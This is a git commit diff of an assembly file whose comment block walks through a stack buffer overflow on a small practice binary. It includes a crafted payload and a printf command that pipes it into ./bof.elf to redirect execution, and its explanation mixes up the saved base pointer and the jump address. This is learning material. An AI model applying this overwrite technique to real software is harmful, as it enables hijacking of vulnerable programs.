(docs): finish
This commit is contained in:
parent
a896711866
commit
824a6a079d
13
bof.s
13
bof.s
@ -49,14 +49,15 @@
|
||||
# | x | x | x | x | x | x | x | x | 6a | 11 | 40 | 00 | <-- saved bp (1) | #
|
||||
# |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
|
||||
# #
|
||||
# woohoo more information
|
||||
# Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
|
||||
# to modify the base pointer, so we know that we want to replace the stored address 0x40116a. However, #
|
||||
# since the binary is little endian (LSB), when we want to overwrite the memory, our input will have to #
|
||||
# follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
|
||||
# be able to write 0x401047 (the address we want to jump to). #
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# Allowing us to craft the final payload: "aaaaaaaa\x0\x0\x0\x0\x0\x0\x0\x0\x47\x10\x40". #
|
||||
# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x11\x40". #
|
||||
#---------------------------------------------------------------------------------------------------------------#
|
||||
# Execution: bash -c 'printf "aaaaaaaa\x0\x0\x0\x0\x0\x0\x0\x0\x47\x10\x40" | ./bof.elf' #
|
||||
# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x11\x40" | ./bof.elf' #
|
||||
#---------------------------------------------------------------#-----------------------------------------------#
|
||||
nop # #
|
||||
leave # END OF FUNCTION #
|
||||
|
Loading…
Reference in New Issue
Block a user